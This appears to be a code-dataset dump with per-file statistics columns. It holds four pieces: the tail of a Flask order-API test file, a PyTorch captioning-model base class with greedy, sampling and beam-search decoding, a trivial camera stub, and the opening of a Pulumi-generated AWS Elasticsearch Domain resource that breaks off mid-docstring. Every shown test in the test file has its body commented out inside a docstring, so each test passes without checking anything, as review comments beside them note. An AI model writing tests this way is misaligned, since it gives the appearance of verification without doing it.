    {'date': '2021-01-18T13:23:40', 'id': 3, 'payment_method': 'dinheiro', 'products': [], 'status': 'Pedido Concluído', 'total_price': 0.0},
    {'date': '2021-01-18T13:24:07', 'id': 4, 'payment_method': 'dinheiro', 'products': [], 'status': 'Pedido em andamento', 'total_price': 0.0},
    {'date': '2021-01-18T13:25:51', 'id': 5, 'payment_method': 'dinheiro', 'products': [], 'status': 'Pedido em andamento', 'total_price': 0.0},
    {'date': '2021-01-18T13:26:13', 'id': 6, 'payment_method': 'dinheiro', 'products': [], 'status': 'Pedido em andamento', 'total_price': 0.0},
    {'date': '2021-01-18T13:27:07', 'id': 7, 'payment_method': 'dinheiro', 'products': [], 'status': 'Pedido em andamento', 'total_price': 0.0},
    {'date': '2021-01-18T13:27:40', 'id': 8, 'payment_method': 'dinheiro', 'products': [], 'status': 'Pedido em andamento', 'total_price': 0.0},
    {'date': '2021-01-18T13:31:16', 'id': 9, 'payment_method': 'dinheiro', 'products': [], 'status': 'Pedido em andamento', 'total_price': 0.0},
    {'date': '2021-01-18T13:38:14', 'id': 10, 'payment_method': 'dinheiro', 'products': [], 'status': 'Pedido em andamento', 'total_price': 0.0}
    ]}
    assert response.status_code == 200 """
# NOTE(review): body is commented out via the docstring — this test always
# passes and does not hit /orders/<id>. Consider pytest.mark.skip instead.
def test_Order_GET_ID_request(app):
    """with app.test_client() as client:
    response = client.get('/orders/2')
    data = json.loads(response.data.decode())
    assert data == {'data':
    {'date': '2021-01-18T13:19:43', 'id': 2, 'payment_method': 'dinheiro', 'products': [], 'status': 'Pedido em andamento', 'total_price': 0.0},
    }
    assert response.status_code == 200 """
# NOTE(review): body is commented out via the docstring — this test always
# passes and does not POST to /orders. Consider pytest.mark.skip instead.
def test_Order_POST_request(app):
    """ with app.test_client() as client:
    response = client.post(
    '/orders',
    data=json.dumps(dict(
    status='Pedido em andamento',
    payment_method='dinheiro',
    products=[],
    total_price=5.75
    )),
    content_type='application/json',
    )
    data = json.loads(response.data.decode())
    assert response.status_code == 201
    assert 'Successfully created' in data.get("message")"""
# NOTE(review): body is commented out via the docstring — this test always
# passes and does not PUT to /orders/<id>. Consider pytest.mark.skip instead.
def test_Order_PUT_request(app):
    """with app.test_client() as client:
    response = client.put(
    '/orders/3',
    data=json.dumps(dict(
    status='Pedido Concluído',
    )),
    content_type='application/json',
    )
    data = json.loads(response.data.decode())
    assert response.status_code == 200
    assert data == {'data':
    {'date': '2021-01-18T13:23:40', 'id': 3, 'payment_method': 'dinheiro', 'products': [], 'status': 'Pedido Concluído', 'total_price': 0.0}
    } """
# NOTE(review): body is commented out via the docstring — this test always
# passes and does not DELETE /orders/<id>. Consider pytest.mark.skip instead.
def test_Order_DELETE_request(app):
    """with app.test_client() as client:
    response = client.delete('/orders/11')
    data = json.loads(response.data.decode())
    assert response.status_code == 200
    assert 'ok' in data.get("message") """
| 42.144578
| 153
| 0.563179
| 416
| 3,498
| 4.610577
| 0.185096
| 0.081335
| 0.131387
| 0.181439
| 0.849322
| 0.849322
| 0.819082
| 0.814911
| 0.807091
| 0.807091
| 0
| 0.079666
| 0.246427
| 3,498
| 82
| 154
| 42.658537
| 0.647951
| 0.809034
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.714286
| false
| 0
| 0.285714
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 10
|
f4f1e78a08c98eb8d3771e934a33ab6badf235b9
| 14,472
|
py
|
Python
|
models/CaptioningModel.py
|
yourfatherI/VSR-guided-CIC
|
6d02fbac38ac10635fb62fff965d5ae8dd3174ad
|
[
"BSD-3-Clause"
] | 32
|
2021-03-01T07:02:52.000Z
|
2022-03-30T02:38:35.000Z
|
models/CaptioningModel.py
|
yourfatherI/VSR-guided-CIC
|
6d02fbac38ac10635fb62fff965d5ae8dd3174ad
|
[
"BSD-3-Clause"
] | 6
|
2021-04-14T12:20:16.000Z
|
2022-03-11T11:21:36.000Z
|
models/CaptioningModel.py
|
yourfatherI/VSR-guided-CIC
|
6d02fbac38ac10635fb62fff965d5ae8dd3174ad
|
[
"BSD-3-Clause"
] | 3
|
2021-08-17T13:18:08.000Z
|
2022-02-10T08:15:28.000Z
|
import torch
from torch import nn
from torch import distributions
import functools
import operator
class CaptioningModel(nn.Module):
    """Abstract base for autoregressive captioning decoders.

    Subclasses implement ``init_weights``, ``init_state`` and ``step``;
    this class provides teacher-forced training (``forward``), greedy
    decoding (``test``), RL sampling (``sample_rl``) and beam search.
    All decoding methods operate on tuples: ``step`` may emit several
    parallel output streams per timestep.
    """

    def __init__(self, seq_len):
        # Maximum number of decoding steps used by test/sample_rl/beam search.
        self.seq_len = seq_len
        super(CaptioningModel, self).__init__()

    def init_weights(self):
        """Initialize model parameters. Must be provided by a subclass."""
        raise NotImplementedError

    def init_state(self, b_s, device):
        """Return the initial decoder state for a batch of size ``b_s``."""
        raise NotImplementedError

    def step(self, t, state, prev_outputs, images, seqs, *args, mode='teacher_forcing'):
        """Run a single decoding step at time ``t``.

        Returns ``(outputs, new_state)`` where ``outputs`` is a tuple of
        per-stream tensors. ``mode`` selects teacher forcing vs. feeding
        back the model's own predictions. Must be provided by a subclass.
        """
        raise NotImplementedError

    def forward(self, statics, seqs, *args):
        """Teacher-forced pass over ground-truth sequences ``seqs``.

        Returns a tuple of tensors, one per output stream, each stacked
        along a new time dimension (dim 1).
        """
        device = statics[0].device
        b_s = statics[0].size(0)
        seq_len = seqs[0].size(1)
        state = self.init_state(b_s, device)
        outs = None
        outputs = []
        for t in range(seq_len):
            outs, state = self.step(t, state, outs, statics, seqs, *args, mode='teacher_forcing')
            outputs.append(outs)
        # Transpose [time][stream] -> [stream][time], then concatenate each
        # stream along a new time dimension.
        outputs = list(zip(*outputs))
        outputs = tuple(torch.cat([oo.unsqueeze(1) for oo in o], 1) for o in outputs)
        return outputs

    def test(self, statics, *args):
        """Greedy decoding: at each step feed back the argmax token."""
        device = statics[0].device
        b_s = statics[0].size(0)
        state = self.init_state(b_s, device)
        outs = None
        outputs = []
        for t in range(self.seq_len):
            outs, state = self.step(t, state, outs, statics, None, *args, mode='feedback')
            # Keep only the argmax index of each output stream.
            outs = tuple(torch.max(o, -1)[1] for o in outs)
            outputs.append(outs)
        outputs = list(zip(*outputs))
        outputs = tuple(torch.cat([oo.unsqueeze(1) for oo in o], 1) for o in outputs)
        return outputs

    def sample_rl(self, statics, *args):
        """Sample sequences stochastically (for REINFORCE-style training).

        Returns ``(outputs, log_probs)``: the sampled indices and their
        log-probabilities, each a tuple of (b_s, seq_len) tensors.
        """
        device = statics[0].device
        b_s = statics[0].size(0)
        state = self.init_state(b_s, device)
        outputs = []
        log_probs = []
        for t in range(self.seq_len):
            prev_outputs = outputs[-1] if t > 0 else None
            outs, state = self.step(t, state, prev_outputs, statics, None, *args, mode='feedback')
            outputs.append([])
            log_probs.append([])
            for out in outs:
                # Sample from the categorical distribution over logits and
                # record the log-probability of the drawn sample.
                distr = distributions.Categorical(logits=out)
                sample = distr.sample()
                outputs[-1].append(sample)
                log_probs[-1].append(distr.log_prob(sample))
        outputs = list(zip(*outputs))
        outputs = tuple(torch.cat([oo.unsqueeze(1) for oo in o], 1) for o in outputs)
        log_probs = list(zip(*log_probs))
        log_probs = tuple(torch.cat([oo.unsqueeze(1) for oo in o], 1) for o in log_probs)
        return outputs, log_probs

    def _select_beam(self, input, selected_beam, cur_beam_size, beam_size, b_s, reduced=True):
        """Reindex ``input`` (tensor, or nested list/tuple of tensors) by the
        chosen beams, preserving the nesting structure."""
        if not isinstance(input, list) and not isinstance(input, tuple):
            return self._select_beam_i(input, selected_beam, cur_beam_size, beam_size, b_s, reduced=reduced)
        new_input = []
        for i, s in enumerate(input):
            if isinstance(s, tuple) or isinstance(s, list):
                # One level of nesting (e.g. LSTM (h, c) state pairs).
                new_state_i = []
                for ii, ss in enumerate(s):
                    new_state_ii = self._select_beam_i(ss, selected_beam, cur_beam_size, beam_size, b_s,
                                                      reduced=reduced)
                    new_state_i.append(new_state_ii)
                new_input.append(tuple(new_state_i))
            else:
                new_state_i = self._select_beam_i(s, selected_beam, cur_beam_size, beam_size, b_s, reduced=reduced)
                new_input.append(new_state_i)
        return list(new_input)

    def _select_beam_i(self, input, selected_beam, cur_beam_size, beam_size, b_s, reduced=True):
        """Gather one tensor along the beam dimension.

        ``reduced=True`` means the tensor stores batch and beam flattened
        into dim 0 (b_s * beam); ``reduced=False`` means they are separate
        dims 0 and 1. The output keeps the same convention.
        """
        input_shape = input.shape
        if reduced:
            input_shape = input_shape[1:]
        else:
            input_shape = input_shape[2:]
        input_exp_shape = (b_s, cur_beam_size) + input_shape
        output_exp_shape = (b_s, beam_size) + input_shape
        input_red_shape = (b_s * beam_size,) + input_shape
        # Broadcast selected_beam to match the trailing dims of the input.
        selected_beam_red_size = (b_s, beam_size) + tuple(1 for _ in range(len(input_exp_shape) - 2))
        selected_beam_exp_size = (b_s, beam_size) + input_exp_shape[2:]
        input_exp = input.view(input_exp_shape)
        selected_beam_exp = selected_beam.view(selected_beam_red_size).expand(selected_beam_exp_size).long()
        out = torch.gather(input_exp, 1, selected_beam_exp)
        if reduced:
            out = out.view(input_red_shape)
        else:
            out = out.view(output_exp_shape)
        return out

    def beam_search(self, statics, eos_idxs, beam_size, out_size=1, *args):
        """Beam search over (possibly multiple) joint output streams.

        The joint log-prob tensor has one axis per output stream; flattening
        and sorting it picks the top ``beam_size`` (beam, stream indices)
        combinations each step. Returns ``(outputs, log_probs)``, each a
        list of tensors truncated to the best ``out_size`` beams.
        """
        device = statics[0].device
        b_s = statics[0].size(0)
        state = self.init_state(b_s, device)
        outputs = []
        log_probs = []
        selected_outs = None
        for t in range(self.seq_len):
            # import pdb;pdb.set_trace()
            outs_logprob, state = self.step(t, state, selected_outs, statics, None, *args, mode='feedback')
            if t == 0:
                n_outs = len(outs_logprob)
                cur_beam_size = 1
                # Joint log-prob accumulator: (b_s, beam, 1 per stream).
                seq_logprob = statics[0].data.new_zeros([b_s, 1] + [1]*n_outs)
                seq_masks = [statics[0].data.new_ones((b_s, beam_size))] * n_outs
            else:
                cur_beam_size = beam_size
                old_seq_logprob = seq_logprob
            # Reshape stream i so its vocabulary occupies its own axis.
            outs_logprob = [ol.view([b_s, cur_beam_size] + [1]*i + [-1] + [1]*(n_outs-i-1)) for i, ol in enumerate(outs_logprob)]
            seq_logprob = seq_logprob + functools.reduce(operator.add, outs_logprob)
            # Mask sequence if it reaches EOS
            if t > 0:
                masks = [(so.view(b_s, cur_beam_size) != idx).float() for idx, so in zip(eos_idxs, selected_outs)]
                seq_masks = [sm * m for (sm, m) in zip(seq_masks, masks)]
                outs_logprob = [ol.squeeze() * sm.unsqueeze(-1) for (ol, sm) in zip(outs_logprob, seq_masks)]
                old_seq_logprob = old_seq_logprob.expand_as(seq_logprob).contiguous()
                # Finished beams keep only their first entry; the rest get a
                # large negative score so they are never re-selected.
                old_seq_logprob[:, :, 1:] = -999
                seq_mask_full = torch.clamp(torch.sum(torch.cat([sm.unsqueeze(0) for sm in seq_masks]), 0), 0, 1)
                seq_mask_full = seq_mask_full.view(list(seq_mask_full.shape) + [1] * n_outs)
                seq_logprob = seq_mask_full*seq_logprob + old_seq_logprob*(1-seq_mask_full)
            # Flatten (beam x streams) and keep the top beam_size candidates.
            selected_logprob, selected_idx = torch.sort(seq_logprob.view(b_s, -1), -1, descending=True)
            selected_logprob, selected_idx = selected_logprob[:, :beam_size], selected_idx[:, :beam_size]
            # Decode the flat index back into (beam, per-stream indices).
            _div = functools.reduce(operator.mul, seq_logprob.shape[2:], 1)
            selected_beam = selected_idx // _div
            selected_outs = []
            for i in range(n_outs):
                if i == 0:
                    selected_idx = selected_idx - selected_beam * _div
                else:
                    selected_idx = selected_idx - selected_outs[-1] * _div
                _div = functools.reduce(operator.mul, seq_logprob.shape[3+i:], 1)
                # NOTE(review): true division then .long() truncates toward
                # zero — equivalent to floor-div here since indices are
                # non-negative; newer torch versions warn on this pattern.
                selected_outs.append((selected_idx / _div).long())
            # Update states, statics and seq_mask
            state = self._select_beam(state, selected_beam, cur_beam_size, beam_size, b_s)
            statics = self._select_beam(statics, selected_beam, cur_beam_size, beam_size, b_s)
            seq_masks = self._select_beam(seq_masks, selected_beam, beam_size, beam_size, b_s, reduced=False)
            outputs = self._select_beam(outputs, selected_beam, cur_beam_size, beam_size, b_s, reduced=False)
            outputs.append([so.unsqueeze(-1) for so in selected_outs])
            seq_logprob = selected_logprob.view([b_s, beam_size] + [1]*n_outs)
            outs_logprob = [ol.view(b_s, cur_beam_size, -1) for ol in outs_logprob]
            # Per-step log-prob of the chosen index on each stream.
            this_word_logprob = self._select_beam(outs_logprob, selected_beam, cur_beam_size, beam_size, b_s, reduced=False)
            this_word_logprob = [torch.gather(o, 2, selected_outs[i].unsqueeze(-1)) for i, o in enumerate(this_word_logprob)]
            log_probs.append(this_word_logprob)
            selected_outs = [so.view(-1) for so in selected_outs]
        # Sort result
        # import pdb;pdb.set_trace()
        seq_logprob, sort_idxs = torch.sort(seq_logprob.view(b_s, beam_size, 1), 1, descending=True)
        outputs = list(zip(*outputs))
        outputs = [torch.cat(o, -1) for o in outputs]
        outputs = [torch.gather(o, 1, sort_idxs.expand(b_s, beam_size, self.seq_len)) for o in outputs]
        log_probs = list(zip(*log_probs))
        log_probs = [torch.cat(lp, -1) for lp in log_probs]
        log_probs = [torch.gather(lp, 1, sort_idxs.expand(b_s, beam_size, self.seq_len)) for lp in log_probs]
        outputs = [o.contiguous()[:, :out_size] for o in outputs]
        log_probs = [lp.contiguous()[:, :out_size] for lp in log_probs]
        if out_size == 1:
            outputs = [o.squeeze(1) for o in outputs]
            log_probs = [lp.squeeze(1) for lp in log_probs]
        return outputs, log_probs

    def beam_search_v(self, statics, eos_idxs, beam_size, out_size=1, *args, gt=False):
        """Beam-search variant driven by ``self.step_v``.

        NOTE(review): ``step_v`` is not defined in this class — presumably
        a subclass supplies it (word logits plus a gate-weight stream);
        confirm against the concrete model. Shape annotations below follow
        the original author's comments (b_s=batch, bm_s=beam, v_s=vocab).
        """
        device = statics[0].device
        b_s = statics[0].size(0)
        state = self.init_state(b_s, device)
        outputs = []
        log_probs = []
        selected_outs = None
        for t in range(self.seq_len):
            # outs_logprob: (out, gate_weights),
            # state: (state_1, state_2, ctrl_det_idxs)
            # outs_logprob, state = self.step_v(t, state, selected_outs, statics, None, *args, mode='feedback')
            outs_logprob, state = self.step_v(t, state, selected_outs, statics, None, *args, mode='feedback', gt=gt)
            if t == 0:
                n_outs = len(outs_logprob)  # 2
                cur_beam_size = 1
                seq_logprob = statics[0].data.new_zeros([b_s, 1] + [1]*n_outs)  # (b_s, 1, 1, 1)
                seq_masks = [statics[0].data.new_ones((b_s, beam_size))] * n_outs  # [(b_s, bm_s), (b_s, bm_s)]
            else:
                cur_beam_size = beam_size
                old_seq_logprob = seq_logprob
            # out: (b_s, cur_b_s, -1, 1), gate_weights: (b_s, cur_b_s, 1, -1)
            outs_logprob = [ol.view([b_s, cur_beam_size] + [1]*i + [-1] + [1]*(n_outs-i-1)) for i, ol in enumerate(outs_logprob)]
            # seq_logprob: (b_s, cur_b_s, v_s, 2)
            seq_logprob = seq_logprob + functools.reduce(operator.add, outs_logprob)
            # Mask sequence if it reaches EOS
            if t > 0:
                masks = [(so.view(b_s, cur_beam_size) != idx).float() for idx, so in zip(eos_idxs, selected_outs)]
                seq_masks = [sm * m for (sm, m) in zip(seq_masks, masks)]
                outs_logprob = [ol.squeeze() * sm.unsqueeze(-1) for (ol, sm) in zip(outs_logprob, seq_masks)]
                old_seq_logprob = old_seq_logprob.expand_as(seq_logprob).contiguous()
                old_seq_logprob[:, :, 1:] = -999
                seq_mask_full = torch.clamp(torch.sum(torch.cat([sm.unsqueeze(0) for sm in seq_masks]), 0), 0, 1)
                seq_mask_full = seq_mask_full.view(list(seq_mask_full.shape) + [1] * n_outs)
                seq_logprob = seq_mask_full*seq_logprob + old_seq_logprob*(1-seq_mask_full)
            # Sort over the flattened (b_s, v_s * 2) scores and keep the
            # top bm_s candidates -> (b_s, bm_s).
            selected_logprob, selected_idx = torch.sort(seq_logprob.view(b_s, -1), -1, descending=True)
            selected_logprob, selected_idx = selected_logprob[:, :beam_size], selected_idx[:, :beam_size]
            # _div = v_s * 2
            _div = functools.reduce(operator.mul, seq_logprob.shape[2:], 1)
            # selected_beam: (b_s, bm_s), identifies which beam was chosen.
            selected_beam = selected_idx // _div
            selected_outs = []
            for i in range(n_outs):
                if i == 0:
                    # Which word was selected (after dividing by 2).
                    selected_idx = selected_idx - selected_beam * _div
                else:
                    # _div = 2
                    selected_idx = selected_idx - selected_outs[-1] * _div
                # _div = 2
                _div = functools.reduce(operator.mul, seq_logprob.shape[3+i:], 1)
                selected_outs.append((selected_idx / _div).long())
            # Each (b_s, bm_s): the first entry is the selected word, the
            # second the selected gate.
            # Update states, statics and seq_mask
            state = self._select_beam(state, selected_beam, cur_beam_size, beam_size, b_s)
            statics = self._select_beam(statics, selected_beam, cur_beam_size, beam_size, b_s)
            seq_masks = self._select_beam(seq_masks, selected_beam, beam_size, beam_size, b_s, reduced=False)
            outputs = self._select_beam(outputs, selected_beam, cur_beam_size, beam_size, b_s, reduced=False)
            outputs.append([so.unsqueeze(-1) for so in selected_outs])
            # (b_s, bm_s, 1, 1)
            seq_logprob = selected_logprob.view([b_s, beam_size] + [1]*n_outs)
            # out: (b_s, cur_b_s, v_s), gate_weights: (b_s, cur_b_s, 2)
            outs_logprob = [ol.view(b_s, cur_beam_size, -1) for ol in outs_logprob]
            # out: (b_s, bm_s, v_s), gate_weights: (b_s, bm_s, 2)
            this_word_logprob = self._select_beam(outs_logprob, selected_beam, cur_beam_size, beam_size, b_s, reduced=False)
            this_word_logprob = [torch.gather(o, 2, selected_outs[i].unsqueeze(-1)) for i, o in enumerate(this_word_logprob)]
            log_probs.append(this_word_logprob)
            # (b_s * bm_s)
            selected_outs = [so.view(-1) for so in selected_outs]
        # Sort result
        # seq_logprob: (b_s, bm_s, 1)
        seq_logprob, sort_idxs = torch.sort(seq_logprob.view(b_s, beam_size, 1), 1, descending=True)
        # Separate vocab indices from gate indices, then concatenate each
        # stream along the time dimension.
        outputs = list(zip(*outputs))
        outputs = [torch.cat(o, -1) for o in outputs]
        outputs = [torch.gather(o, 1, sort_idxs.expand(b_s, beam_size, self.seq_len)) for o in outputs]
        log_probs = list(zip(*log_probs))
        log_probs = [torch.cat(lp, -1) for lp in log_probs]
        log_probs = [torch.gather(lp, 1, sort_idxs.expand(b_s, beam_size, self.seq_len)) for lp in log_probs]
        outputs = [o.contiguous()[:, :out_size] for o in outputs]
        log_probs = [lp.contiguous()[:, :out_size] for lp in log_probs]
        if out_size == 1:
            outputs = [o.squeeze(1) for o in outputs]
            log_probs = [lp.squeeze(1) for lp in log_probs]
        return outputs, log_probs
| 49.057627
| 129
| 0.600746
| 2,077
| 14,472
| 3.892634
| 0.073664
| 0.018058
| 0.032653
| 0.033643
| 0.811998
| 0.783673
| 0.780087
| 0.758318
| 0.737168
| 0.721583
| 0
| 0.014677
| 0.284411
| 14,472
| 294
| 130
| 49.22449
| 0.766029
| 0.061774
| 0
| 0.715556
| 0
| 0
| 0.004576
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048889
| false
| 0
| 0.022222
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
52094fb4fa09a56d3d50c001eb8cb81eeae0d6c5
| 32
|
py
|
Python
|
api/app/cameraClient.py
|
fairglen/gandalf
|
97daa12dcf3b476207126765da960662cf51f214
|
[
"Apache-2.0"
] | 1
|
2020-03-27T17:13:21.000Z
|
2020-03-27T17:13:21.000Z
|
api/app/cameraClient.py
|
fairglen/gandalf
|
97daa12dcf3b476207126765da960662cf51f214
|
[
"Apache-2.0"
] | 7
|
2020-06-05T20:05:32.000Z
|
2022-03-12T00:12:08.000Z
|
api/app/cameraClient.py
|
fairglen/gandalf
|
97daa12dcf3b476207126765da960662cf51f214
|
[
"Apache-2.0"
] | null | null | null |
def capture():
    """Return a fixed placeholder payload for the camera capture stub."""
    placeholder = "poop"
    return placeholder
| 16
| 17
| 0.625
| 4
| 32
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.21875
| 32
| 2
| 17
| 16
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
52510f789a5602898c43250be8c32254b024978e
| 31,158
|
py
|
Python
|
sdk/python/pulumi_aws/elasticsearch/domain.py
|
JakeGinnivan/pulumi-aws
|
c91ef78932964ac74eda7f5da81f65b0f1798c93
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/elasticsearch/domain.py
|
JakeGinnivan/pulumi-aws
|
c91ef78932964ac74eda7f5da81f65b0f1798c93
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/elasticsearch/domain.py
|
JakeGinnivan/pulumi-aws
|
c91ef78932964ac74eda7f5da81f65b0f1798c93
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class Domain(pulumi.CustomResource):
access_policies: pulumi.Output[str]
"""
IAM policy document specifying the access policies for the domain
"""
advanced_options: pulumi.Output[dict]
"""
Key-value string pairs to specify advanced configuration options.
Note that the values for these configuration options must be strings (wrapped in quotes) or they
may be wrong and cause a perpetual diff, causing this provider to want to recreate your Elasticsearch
domain on every apply.
"""
arn: pulumi.Output[str]
"""
Amazon Resource Name (ARN) of the domain.
"""
cluster_config: pulumi.Output[dict]
"""
Cluster configuration of the domain, see below.
* `dedicatedMasterCount` (`float`) - Number of dedicated master nodes in the cluster
* `dedicatedMasterEnabled` (`bool`) - Indicates whether dedicated master nodes are enabled for the cluster.
* `dedicatedMasterType` (`str`) - Instance type of the dedicated master nodes in the cluster.
* `instance_count` (`float`) - Number of instances in the cluster.
* `instance_type` (`str`) - Instance type of data nodes in the cluster.
* `warmCount` (`float`) - The number of warm nodes in the cluster. Valid values are between `2` and `150`. `warm_count` can be only and must be set when `warm_enabled` is set to `true`.
* `warmEnabled` (`bool`) - Indicates whether to enable warm storage.
* `warmType` (`str`) - The instance type for the Elasticsearch cluster's warm nodes. Valid values are `ultrawarm1.medium.elasticsearch`, `ultrawarm1.large.elasticsearch` and `ultrawarm1.xlarge.elasticsearch`. `warm_type` can be only and must be set when `warm_enabled` is set to `true`.
* `zoneAwarenessConfig` (`dict`) - Configuration block containing zone awareness settings. Documented below.
* `availabilityZoneCount` (`float`) - Number of Availability Zones for the domain to use with `zone_awareness_enabled`. Defaults to `2`. Valid values: `2` or `3`.
* `zoneAwarenessEnabled` (`bool`) - Indicates whether zone awareness is enabled, set to `true` for multi-az deployment. To enable awareness with three Availability Zones, the `availability_zone_count` within the `zone_awareness_config` must be set to `3`.
"""
cognito_options: pulumi.Output[dict]
domain_endpoint_options: pulumi.Output[dict]
"""
Domain endpoint HTTP(S) related options. See below.
* `enforceHttps` (`bool`) - Whether or not to require HTTPS
* `tlsSecurityPolicy` (`str`) - The name of the TLS security policy that needs to be applied to the HTTPS endpoint. Valid values: `Policy-Min-TLS-1-0-2019-07` and `Policy-Min-TLS-1-2-2019-07`. This provider will only perform drift detection if a configuration value is provided.
"""
domain_id: pulumi.Output[str]
"""
Unique identifier for the domain.
"""
domain_name: pulumi.Output[str]
"""
Name of the domain.
"""
ebs_options: pulumi.Output[dict]
"""
EBS related options, may be required based on chosen [instance size](https://aws.amazon.com/elasticsearch-service/pricing/). See below.
* `ebsEnabled` (`bool`) - Whether EBS volumes are attached to data nodes in the domain.
* `iops` (`float`) - The baseline input/output (I/O) performance of EBS volumes
attached to data nodes. Applicable only for the Provisioned IOPS EBS volume type.
* `volume_size` (`float`) - The size of EBS volumes attached to data nodes (in GB).
**Required** if `ebs_enabled` is set to `true`.
* `volumeType` (`str`) - The type of EBS volumes attached to data nodes.
"""
elasticsearch_version: pulumi.Output[str]
"""
The version of Elasticsearch to deploy. Defaults to `1.5`
"""
encrypt_at_rest: pulumi.Output[dict]
"""
Encrypt at rest options. Only available for [certain instance types](http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/aes-supported-instance-types.html). See below.
* `enabled` (`bool`) - Specifies whether Amazon Cognito authentication with Kibana is enabled or not
* `kms_key_id` (`str`) - The KMS key id to encrypt the Elasticsearch domain with. If not specified then it defaults to using the `aws/es` service KMS key.
"""
endpoint: pulumi.Output[str]
"""
Domain-specific endpoint used to submit index, search, and data upload requests.
"""
kibana_endpoint: pulumi.Output[str]
"""
Domain-specific endpoint for kibana without https scheme.
* `vpc_options.0.availability_zones` - If the domain was created inside a VPC, the names of the availability zones the configured `subnet_ids` were created inside.
* `vpc_options.0.vpc_id` - If the domain was created inside a VPC, the ID of the VPC.
"""
log_publishing_options: pulumi.Output[list]
"""
Options for publishing slow logs to CloudWatch Logs.
* `cloudwatch_log_group_arn` (`str`) - ARN of the Cloudwatch log group to which log needs to be published.
* `enabled` (`bool`) - Specifies whether Amazon Cognito authentication with Kibana is enabled or not
* `logType` (`str`) - A type of Elasticsearch log. Valid values: INDEX_SLOW_LOGS, SEARCH_SLOW_LOGS, ES_APPLICATION_LOGS
"""
node_to_node_encryption: pulumi.Output[dict]
"""
Node-to-node encryption options. See below.
* `enabled` (`bool`) - Specifies whether Amazon Cognito authentication with Kibana is enabled or not
"""
snapshot_options: pulumi.Output[dict]
"""
Snapshot related options, see below.
* `automatedSnapshotStartHour` (`float`) - Hour during which the service takes an automated daily
snapshot of the indices in the domain.
"""
tags: pulumi.Output[dict]
"""
A map of tags to assign to the resource
"""
vpc_options: pulumi.Output[dict]
"""
VPC related options, see below. Adding or removing this configuration forces a new resource ([documentation](https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html#es-vpc-limitations)).
* `availability_zones` (`list`)
* `security_group_ids` (`list`) - List of VPC Security Group IDs to be applied to the Elasticsearch domain endpoints. If omitted, the default Security Group for the VPC will be used.
* `subnet_ids` (`list`) - List of VPC Subnet IDs for the Elasticsearch domain endpoints to be created in.
* `vpc_id` (`str`)
"""
def __init__(__self__, resource_name, opts=None, access_policies=None, advanced_options=None, cluster_config=None, cognito_options=None, domain_endpoint_options=None, domain_name=None, ebs_options=None, elasticsearch_version=None, encrypt_at_rest=None, log_publishing_options=None, node_to_node_encryption=None, snapshot_options=None, tags=None, vpc_options=None, __props__=None, __name__=None, __opts__=None):
"""
Manages an AWS Elasticsearch Domain.
## Example Usage
### Basic Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.elasticsearch.Domain("example",
cluster_config={
"cluster_config": "r4.large.elasticsearch",
},
elasticsearch_version="1.5",
snapshot_options={
"snapshot_options": 23,
},
tags={
"Domain": "TestDomain",
})
```
### Access Policy
```python
import pulumi
import pulumi_aws as aws
config = pulumi.Config()
domain = config.get("domain")
if domain is None:
domain = "tf-test"
current_region = aws.get_region()
current_caller_identity = aws.get_caller_identity()
example = aws.elasticsearch.Domain("example", access_policies=f\"\"\"{{
"Version": "2012-10-17",
"Statement": [
{{
"Action": "es:*",
"Principal": "*",
"Effect": "Allow",
"Resource": "arn:aws:es:{current_region.name}:{current_caller_identity.account_id}:domain/{domain}/*",
"Condition": {{
"IpAddress": {{"aws:SourceIp": ["66.193.100.22/32"]}}
}}
}}
]
}}
\"\"\")
```
### Log Publishing to CloudWatch Logs
```python
import pulumi
import pulumi_aws as aws
example_log_group = aws.cloudwatch.LogGroup("exampleLogGroup")
example_log_resource_policy = aws.cloudwatch.LogResourcePolicy("exampleLogResourcePolicy",
policy_document=\"\"\"{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "es.amazonaws.com"
},
"Action": [
"logs:PutLogEvents",
"logs:PutLogEventsBatch",
"logs:CreateLogStream"
],
"Resource": "arn:aws:logs:*"
}
]
}
\"\"\",
policy_name="example")
example_domain = aws.elasticsearch.Domain("exampleDomain", log_publishing_options=[{
"cloudwatch_log_group_arn": example_log_group.arn,
"logType": "INDEX_SLOW_LOGS",
}])
```
### VPC based ES
```python
import pulumi
import pulumi_aws as aws
config = pulumi.Config()
vpc = config.require_object("vpc")
domain = config.get("domain")
if domain is None:
domain = "tf-test"
selected_vpc = aws.ec2.get_vpc(tags={
"Name": vpc,
})
selected_subnet_ids = aws.ec2.get_subnet_ids(tags={
"Tier": "private",
},
